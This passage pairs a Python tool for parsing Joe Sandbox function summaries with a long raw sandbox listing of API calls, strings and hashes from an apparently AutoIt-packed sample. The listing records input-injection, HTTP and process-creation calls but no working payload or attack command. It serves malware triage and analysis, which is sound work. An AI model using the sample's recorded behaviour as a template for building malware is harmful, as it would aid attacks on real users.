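API_RE = re.compile(r"^• (?P<api>[A-Za-z_]\w*)\.(?P<module>\w+)"
                    r"(?:\((?P<args>.*)\))?,? ref: (?P<ref>[0-9A-Fa-f]{8})$")


@dataclass
class FuncSummary:
    apis: list = field(default_factory=list)   # (api, module, args, ref)
    string_id: str = ""
    api_string_id: str = ""
    dump: dict = field(default_factory=dict)


def decode_dump_name(name: str) -> dict:
    """Split an 8-field Joe Sandbox .sdmp name and decode the fields we know."""
    parts = (name[:-5] if name.endswith(".sdmp") else name).split(".")
    if len(parts) != 8:
        raise ValueError(f"unexpected field count in {name!r}")
    prot, mtype = int(parts[4], 16), int(parts[6], 16)
    return {
        "process_index": int(parts[0], 16),  # assumption: 0 = submitted sample
        "phase": int(parts[1], 16),          # assumption: 2 = post-execution dump
        "base": int(parts[3], 16),
        "protection": PAGE_PROTECTION.get(prot, hex(prot)),
        "type": MEM_TYPE.get(mtype, hex(mtype)),
        "raw_fields": parts,                 # fields 3, 6 and 8 are left undecoded
    }


def parse_summaries(text: str) -> list:
    """One FuncSummary per 'APIs' block, in report order."""
    blocks, cur, section = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":
            cur = FuncSummary()
            blocks.append(cur)
            section = "apis"
        elif cur is None:
            continue
        elif line in ("Strings", "Memory Dump Source", "Similarity", "Joe Sandbox IDA Plugin"):
            section = line
        elif section == "apis" and (m := API_RE.match(line)):
            cur.apis.append((m["api"], m["module"], m["args"] or "", m["ref"]))
        elif line.startswith("• Source File: "):
            cur.dump = decode_dump_name(line[len("• Source File: "):].split(",")[0])
        elif line.startswith("• String ID: "):
            cur.string_id = line[len("• String ID: "):]
        elif line.startswith("• API String ID: "):
            cur.api_string_id = line[len("• API String ID: "):]
    return blocks


def classify(summary: FuncSummary) -> str:
    """'autoit-runtime' if a known interpreter marker appears, otherwise 'review'."""
    haystack = summary.string_id + " " + " ".join(a[2] for a in summary.apis)
    hit = any(marker in haystack for marker in AUTOIT_RUNTIME_MARKERS)
    return "autoit-runtime" if hit else "review"


# Constructed excerpt: two blocks copied from the function list above.
SAMPLE = """\
APIs
• GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,0054E2A0,00000010,?,Bad directive syntax error,0059F910,00000000,?,?,?,>>>AUTOIT SCRIPT<<<), ref: 0056F7C2
• MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 0056F88D
Memory Dump Source
• Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
Similarity
• String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
• API String ID: 1506413516-4153970271
APIs
Memory Dump Source
• Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
Similarity
• API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
• String ID: 0.0.0.0
• API String ID: 208665112-3771769585
"""

if __name__ == "__main__":
    for b in parse_summaries(SAMPLE):
        print(classify(b), b.dump["protection"], hex(b.dump["base"]), b.string_id)
```

Run as-is it prints one line per block; paste the full function list into `SAMPLE` (or read it from a file) to tag every block. Functions tagged `review` are the ones whose API and string sets the report does not explain away as interpreter plumbing, which is where the analyst's time goes; the `API String ID` pair doubles as a stable key for tracking the same routine across other AutoIt-packed samples.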
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: __i64tow__itow__swprintf
                                                                      • String ID: %.15g$0x%p$False$True
                                                                      • API String ID: 421087845-2263619337
APIs
• _memset.LIBCMT ref: 0059716A
• CreateMenu.USER32 ref: 00597185
• SetMenu.USER32(?,00000000), ref: 00597194
• GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00597221
• IsMenu.USER32(?), ref: 00597237
• CreatePopupMenu.USER32 ref: 00597241
• InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 0059726E
• DrawMenuBar.USER32 ref: 00597276
Similarity
• API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
• String ID: 0$F
• API String ID: 176399719-3044882817
APIs
• MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 0059755E
• CreateCompatibleDC.GDI32(00000000), ref: 00597565
• SendMessageW.USER32(?,00000173,00000000,00000000), ref: 00597578
• SelectObject.GDI32(00000000,00000000), ref: 00597580
• GetPixel.GDI32(00000000,00000000,00000000), ref: 0059758B
• DeleteDC.GDI32(00000000), ref: 00597594
• GetWindowLongW.USER32(?,000000EC), ref: 0059759E
• SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 005975B2
• DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 005975BE
Similarity
• API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
• String ID: static
• API String ID: 2559357485-2160076837
APIs
• _memset.LIBCMT ref: 00536E3E
  • Part of subcall function 00538B28: __getptd_noexit.LIBCMT ref: 00538B28
• __gmtime64_s.LIBCMT ref: 00536ED7
• __gmtime64_s.LIBCMT ref: 00536F0D
• __gmtime64_s.LIBCMT ref: 00536F2A
• __allrem.LIBCMT ref: 00536F80
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00536F9C
• __allrem.LIBCMT ref: 00536FB3
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00536FD1
• __allrem.LIBCMT ref: 00536FE8
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00537006
• __invoke_watson.LIBCMT ref: 00537077
Similarity
• API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
• String ID:
• API String ID: 384356119-0
APIs
• _memset.LIBCMT ref: 00572542
• GetMenuItemInfoW.USER32(005D5890,000000FF,00000000,00000030), ref: 005725A3
• SetMenuItemInfoW.USER32(005D5890,00000004,00000000,00000030), ref: 005725D9
• Sleep.KERNEL32(000001F4), ref: 005725EB
• GetMenuItemCount.USER32(?), ref: 0057262F
• GetMenuItemID.USER32(?,00000000), ref: 0057264B
• GetMenuItemID.USER32(?,-00000001), ref: 00572675
• GetMenuItemID.USER32(?,?), ref: 005726BA
• CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00572700
• GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00572714
• SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00572735
Similarity
• API ID: ItemMenu$Info$CheckCountRadioSleep_memset
• String ID:
• API String ID: 4176008265-0
APIs
• SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00596FA5
• SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00596FA8
• GetWindowLongW.USER32(?,000000F0), ref: 00596FCC
• _memset.LIBCMT ref: 00596FDD
• SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00596FEF
• SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00597067
Similarity
• API ID: MessageSend$LongWindow_memset
• String ID:
• API String ID: 830647256-0
APIs
• SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00566BBF
• SafeArrayAllocData.OLEAUT32(?), ref: 00566C18
• VariantInit.OLEAUT32(?), ref: 00566C2A
• SafeArrayAccessData.OLEAUT32(?,?), ref: 00566C4A
• VariantCopy.OLEAUT32(?,?), ref: 00566C9D
• SafeArrayUnaccessData.OLEAUT32(?), ref: 00566CB1
• VariantClear.OLEAUT32(?), ref: 00566CC6
• SafeArrayDestroyData.OLEAUT32(?), ref: 00566CD3
• SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00566CDC
• VariantClear.OLEAUT32(?), ref: 00566CEE
• SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00566CF9
Similarity
• API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
• String ID:
• API String ID: 2706829360-0
APIs
  • Part of subcall function 00519837: __itow.LIBCMT ref: 00519862
  • Part of subcall function 00519837: __swprintf.LIBCMT ref: 005198AC
• CoInitialize.OLE32 ref: 00588403
• CoUninitialize.OLE32 ref: 0058840E
• CoCreateInstance.OLE32(?,00000000,00000017,005A2BEC,?), ref: 0058846E
• IIDFromString.OLE32(?,?), ref: 005884E1
• VariantInit.OLEAUT32(?), ref: 0058857B
• VariantClear.OLEAUT32(?), ref: 005885DC
Similarity
• API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
• String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
• API String ID: 834269672-1287834457
APIs
• WSAStartup.WSOCK32(00000101,?), ref: 00585793
• inet_addr.WSOCK32(?,?,?), ref: 005857D8
• gethostbyname.WSOCK32(?), ref: 005857E4
• IcmpCreateFile.IPHLPAPI ref: 005857F2
• IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00585862
• IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00585878
• IcmpCloseHandle.IPHLPAPI(00000000), ref: 005858ED
• WSACleanup.WSOCK32 ref: 005858F3
Similarity
• API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
• String ID: Ping
• API String ID: 1028309954-2246546115
APIs
• SetErrorMode.KERNEL32(00000001), ref: 0057B4D0
• GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 0057B546
• GetLastError.KERNEL32 ref: 0057B550
• SetErrorMode.KERNEL32(00000000,READY), ref: 0057B5BD
Similarity
• API ID: Error$Mode$DiskFreeLastSpace
• String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
• API String ID: 4194297153-14809454
• Opcode ID: 3d2e3db6f0a8fec87e85bf0ea36731fe352bce6852178c1a8125634642faaeb2
• Instruction ID: c38bca42c91b8770a367750280b7f1fd8552231b2c9590ff44706726dbc6fd50
• Instruction Fuzzy Hash: 1631A335A0020ADFEB00DB68D849FBE7FB4FF48314F108166E509D7291EB709A45EB51
APIs
  • Part of subcall function 00517DE1: _memmove.LIBCMT ref: 00517E22
  • Part of subcall function 0056AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0056AABC
• SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 00569014
• GetDlgCtrlID.USER32 ref: 0056901F
• GetParent.USER32 ref: 0056903B
• SendMessageW.USER32(00000000,?,00000111,?), ref: 0056903E
• GetDlgCtrlID.USER32(?), ref: 00569047
• GetParent.USER32(?), ref: 00569063
• SendMessageW.USER32(00000000,?,?,00000111), ref: 00569066
Similarity
• API ID: MessageSend$CtrlParent$ClassName_memmove
• String ID: ComboBox$ListBox
• API String ID: 1536045017-1403004172
• Opcode ID: a4cd657f487a171ab3c3b2b5d787fb569d6cea35b7f98366a901d13dfccbb590
• Instruction ID: be932247268e1358938f86f9e875e87a18a616fc4952592e837d3b2159b55630
• Instruction Fuzzy Hash: DC21D874A00209BFDF04ABA4DC89EFEBF78FF99310F100116B521972A1DB755859DB20
APIs
  • Part of subcall function 00517DE1: _memmove.LIBCMT ref: 00517E22
  • Part of subcall function 0056AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0056AABC
• SendMessageW.USER32(?,00000186,00000002,00000000), ref: 005690FD
• GetDlgCtrlID.USER32 ref: 00569108
• GetParent.USER32 ref: 00569124
• SendMessageW.USER32(00000000,?,00000111,?), ref: 00569127
• GetDlgCtrlID.USER32(?), ref: 00569130
• GetParent.USER32(?), ref: 0056914C
• SendMessageW.USER32(00000000,?,?,00000111), ref: 0056914F
Similarity
• API ID: MessageSend$CtrlParent$ClassName_memmove
• String ID: ComboBox$ListBox
• API String ID: 1536045017-1403004172
• Opcode ID: d19a8d5528485fa8b9535cbdc1081ab57ff02bf806033e5beb17ac3a87dff672
• Instruction ID: 04f8bda2fdd3e34ad43f2a8b78c6cc911deed09a20b16b6ceb3588d281a5358f
• Instruction Fuzzy Hash: 9821C875A00209BFDF01ABA4DC89EFEBF78FF99300F114016B511972A1DB795459DB20
APIs
• GetParent.USER32 ref: 0056916F
• GetClassNameW.USER32(00000000,?,00000100), ref: 00569184
• _wcscmp.LIBCMT ref: 00569196
• SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00569211
Similarity
• API ID: ClassMessageNameParentSend_wcscmp
• String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
• API String ID: 1704125052-3381328864
• Opcode ID: 0112b051cfe9c1301a07c1cc090f1d8e3fd17e7ffdb6a67e408d19f7c09ae6c3
• Instruction ID: 439d8cf44d6f8e67912561ea014994b4a675c21df1e3f32d3248b440edd8cbb1
• Instruction Fuzzy Hash: DE11EC3A24C70BB9FA112664EC1BDB73F9CFB55720F200426F910E64D1FE7158516A54
APIs
• SafeArrayGetVartype.OLEAUT32(00000000,?), ref: 00577A6C
Similarity
• API ID: ArraySafeVartype
• String ID:
• API String ID: 1725837607-0
• Opcode ID: 482c1eee5c30882c2db8a2d96c5555623d3edbc432146f5befa65a55516f1bfe
• Instruction ID: 2aceb7b5052f2002bf9816854c41c745bbebab2fcd81cd221bb905c3ba479b3b
• Instruction Fuzzy Hash: 6FB18E7190421A9FDB01DFA4E885BBEBBB8FF4D321F218425E609E7241D734A941EB91
APIs
• GetCurrentThreadId.KERNEL32 ref: 005711F0
• GetForegroundWindow.USER32(00000000,?,?,?,?,?,00570268,?,00000001), ref: 00571204
• GetWindowThreadProcessId.USER32(00000000), ref: 0057120B
• AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00570268,?,00000001), ref: 0057121A
• GetWindowThreadProcessId.USER32(?,00000000), ref: 0057122C
• AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00570268,?,00000001), ref: 00571245
• AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00570268,?,00000001), ref: 00571257
• AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00570268,?,00000001), ref: 0057129C
• AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00570268,?,00000001), ref: 005712B1
• AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00570268,?,00000001), ref: 005712BC
Similarity
• API ID: Thread$AttachInput$Window$Process$CurrentForeground
• String ID:
• API String ID: 2156557900-0
• Opcode ID: 6d0f1a22f3dd5756f5412cf39e7c83f33a659938283f4faa5d540749cb8402e5
• Instruction ID: 71a4b00d8da190871f520bb1763dd3eab095b04e7a0958a8537834f4ef08ecaf
• Instruction Fuzzy Hash: A531E179601B04BBDB309F59FD48F693BA9FB64311F118117F808D61A1E7709D88AB54
APIs
• mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 0051FAA6
• OleUninitialize.OLE32(?,00000000), ref: 0051FB45
• UnregisterHotKey.USER32(?), ref: 0051FC9C
• DestroyWindow.USER32(?), ref: 005545D6
• FreeLibrary.KERNEL32(?), ref: 0055463B
• VirtualFree.KERNEL32(?,00000000,00008000), ref: 00554668
Similarity
• API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
• String ID: close all
• API String ID: 469580280-3243417748
• Opcode ID: fdf38c7feb6e47c599c0f4b433ab7a60fb0cd4d8c711e906c70c1857998bee6e
• Instruction ID: 9031643cf8dce3f6551cae2b1a22f9d74bc7ffe87a3523173ce0e19d43714e27
• Instruction Fuzzy Hash: FEA19230305213CFDB19EF14D5A9BA9FB64BF55705F1046AEE80AAB251DB30AC96CF90
APIs
Similarity
• API ID: Variant$ClearInit$_memset
• String ID: ,,Z$Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
• API String ID: 2862541840-2069657162
• Opcode ID: 2dae4cc132a976f666b6229aab3d9e6e4437323da1bfab5eabcc8ea4dc58a3e1
• Instruction ID: 19a52225e7bdfe594d1ff32d0c839e017b5faa045a2ea2f37878a0e71f143131
• Instruction Fuzzy Hash: 1F917171A00215ABDF24EFA5C848FAEBFB8FF85710F148559F915BB280DB709945CBA0
APIs
• EnumChildWindows.USER32(?,0056A439), ref: 0056A377
Similarity
• API ID: ChildEnumWindows
• String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
• API String ID: 3555792229-1603158881
• Opcode ID: 96a4ce7526964a88c514eebad7cf8337cf2af13e17f1a1b3eb66060a4976944b
• Instruction ID: 212689538bd9547970ad1c3216ca721d5e5752a8bb2a82757f9d1fbe66af699f
• Instruction Fuzzy Hash: 9D91A331A0060AAEDB08DFA0C456BEDFFB4BF44300F549519E85AB7281DF316999CF91
APIs
• SetWindowLongW.USER32(?,000000EB), ref: 00512EAE
  • Part of subcall function 00511DB3: GetClientRect.USER32(?,?), ref: 00511DDC
  • Part of subcall function 00511DB3: GetWindowRect.USER32(?,?), ref: 00511E1D
  • Part of subcall function 00511DB3: ScreenToClient.USER32(?,?), ref: 00511E45
• GetDC.USER32 ref: 0054CD32
• SendMessageW.USER32(?,00000031,00000000,00000000), ref: 0054CD45
• SelectObject.GDI32(00000000,00000000), ref: 0054CD53
• SelectObject.GDI32(00000000,00000000), ref: 0054CD68
• ReleaseDC.USER32(?,00000000), ref: 0054CD70
• MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 0054CDFB
Similarity
• API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
• String ID: U
• API String ID: 4009187628-3372436214
• Opcode ID: 934a2c5a0f5b8a428bdd00fa79ab3a65d12d1c356f73820364da2d9637a66a65
• Instruction ID: b774298d6bb851f495a5d72939631c6e158b4772d0da84c8cbfcac13f95d00f0
• Instruction Fuzzy Hash: C7710431901205DFCF618F64C884AFA3FB5FF88328F14467AED559A2A6D7318C90EB60
APIs
• InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00581A50
• HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00581A7C
• InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 00581ABE
• InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00581AD3
• HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00581AE0
• HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 00581B10
• InternetCloseHandle.WININET(00000000), ref: 00581B57
  • Part of subcall function 00582483: GetLastError.KERNEL32(?,?,00581817,00000000,00000000,00000001), ref: 00582498
  • Part of subcall function 00582483: SetEvent.KERNEL32(?,?,00581817,00000000,00000000,00000001), ref: 005824AD
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorEventHandleInfoLastOpenSend
                                                                      • String ID:
                                                                      • API String ID: 2603140658-3916222277
APIs
• GetModuleFileNameW.KERNEL32(?,?,00000104,?,0059F910), ref: 00588D28
• FreeLibrary.KERNEL32(00000000,00000001,00000000,?,0059F910), ref: 00588D5C
• QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00588ED6
• SysFreeString.OLEAUT32(?), ref: 00588F00
Similarity
• API ID: Free$FileLibraryModuleNamePathQueryStringType
• String ID:
• API String ID: 560350794-0
APIs
• _memset.LIBCMT ref: 0058F6B5
• GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0058F848
• GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0058F86C
• GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0058F8AC
• GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0058F8CE
• CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0058FA4A
• GetLastError.KERNEL32(00000000,00000001,00000000), ref: 0058FA7C
• CloseHandle.KERNEL32(?), ref: 0058FAAB
• CloseHandle.KERNEL32(?), ref: 0058FB22
Similarity
• API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
• String ID:
• API String ID: 4090791747-0
APIs
  • Part of subcall function 0057466E: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00573697,?), ref: 0057468B
  • Part of subcall function 0057466E: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00573697,?), ref: 005746A4
  • Part of subcall function 00574A31: GetFileAttributesW.KERNEL32(?,0057370B), ref: 00574A32
• lstrcmpiW.KERNEL32(?,?), ref: 00574D40
• _wcscmp.LIBCMT ref: 00574D5A
• MoveFileW.KERNEL32(?,?), ref: 00574D75
Similarity
• API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
• String ID:
• API String ID: 793581249-0
APIs
• InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 005986FF
Similarity
• API ID: InvalidateRect
• String ID:
• API String ID: 634782764-0
APIs
• LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 0054C2F7
• ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0054C319
• LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 0054C331
• ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 0054C34F
• SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 0054C370
• DestroyIcon.USER32(00000000), ref: 0054C37F
• SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 0054C39C
• DestroyIcon.USER32(?), ref: 0054C3AB
  • Part of subcall function 0059A4AF: DeleteObject.GDI32(00000000), ref: 0059A4E8
Similarity
• API ID: Icon$DestroyExtractImageLoadMessageSend$DeleteObject
• String ID:
• API String ID: 2819616528-0
APIs
  • Part of subcall function 0056A82C: GetWindowThreadProcessId.USER32(?,00000000), ref: 0056A84C
  • Part of subcall function 0056A82C: GetCurrentThreadId.KERNEL32 ref: 0056A853
  • Part of subcall function 0056A82C: AttachThreadInput.USER32(00000000,?,00569683,?,00000001), ref: 0056A85A
• MapVirtualKeyW.USER32(00000025,00000000), ref: 0056968E
• PostMessageW.USER32(?,00000100,00000025,00000000), ref: 005696AB
• Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 005696AE
• MapVirtualKeyW.USER32(00000025,00000000), ref: 005696B7
• PostMessageW.USER32(?,00000100,00000027,00000000), ref: 005696D5
• Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 005696D8
• MapVirtualKeyW.USER32(00000025,00000000), ref: 005696E1
• PostMessageW.USER32(?,00000101,00000027,00000000), ref: 005696F8
• Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 005696FB
Similarity
• API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
• String ID:
• API String ID: 2014098862-0
APIs
• GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,0056853C,00000B00,?,?), ref: 0056892A
• HeapAlloc.KERNEL32(00000000,?,0056853C,00000B00,?,?), ref: 00568931
• GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,0056853C,00000B00,?,?), ref: 00568946
• GetCurrentProcess.KERNEL32(?,00000000,?,0056853C,00000B00,?,?), ref: 0056894E
• DuplicateHandle.KERNEL32(00000000,?,0056853C,00000B00,?,?), ref: 00568951
• GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,0056853C,00000B00,?,?), ref: 00568961
• GetCurrentProcess.KERNEL32(0056853C,00000000,?,0056853C,00000B00,?,?), ref: 00568969
• DuplicateHandle.KERNEL32(00000000,?,0056853C,00000B00,?,?), ref: 0056896C
• CreateThread.KERNEL32(00000000,00000000,00568992,00000000,00000000,00000000), ref: 00568986
Similarity
• API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
• String ID:
• API String ID: 1957940570-0
Strings
Similarity
• API ID:
• String ID: NULL Pointer assignment$Not an Object type
• API String ID: 0-572801152
APIs
  • Part of subcall function 0056710A: CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00567044,80070057,?,?,?,00567455), ref: 00567127
  • Part of subcall function 0056710A: ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00567044,80070057,?,?), ref: 00567142
  • Part of subcall function 0056710A: lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00567044,80070057,?,?), ref: 00567150
  • Part of subcall function 0056710A: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00567044,80070057,?), ref: 00567160
• CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 00589806
• _memset.LIBCMT ref: 00589813
• _memset.LIBCMT ref: 00589956
• CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000000), ref: 00589982
• CoTaskMemFree.OLE32(?), ref: 0058998D
Strings
• NULL Pointer assignment, xrefs: 005899DB
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
                                                                      • String ID: NULL Pointer assignment
                                                                      • API String ID: 1300414916-2785691316
                                                                      • Opcode ID: ae2800db83b9ef37a4b3dfde0999cb42cd6ca9616c48c0954135be2cdf15d1e1
                                                                      • Instruction ID: e4f38859743d8005baaf0835633eebbb3e29f6cb61c5c85845eac4f0b97ab818
                                                                      • Opcode Fuzzy Hash: ae2800db83b9ef37a4b3dfde0999cb42cd6ca9616c48c0954135be2cdf15d1e1
                                                                      • Instruction Fuzzy Hash: 72910771D00219EBDB10EFA5DC85EEEBBB9BF48710F10415AF819A7251EB715A44CFA0
                                                                      APIs
                                                                      • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00596E24
                                                                      • SendMessageW.USER32(?,00001036,00000000,?), ref: 00596E38
                                                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00596E52
                                                                      • _wcscat.LIBCMT ref: 00596EAD
                                                                      • SendMessageW.USER32(?,00001057,00000000,?), ref: 00596EC4
                                                                      • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00596EF2
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$Window_wcscat
                                                                      • String ID: SysListView32
                                                                      • API String ID: 307300125-78025650
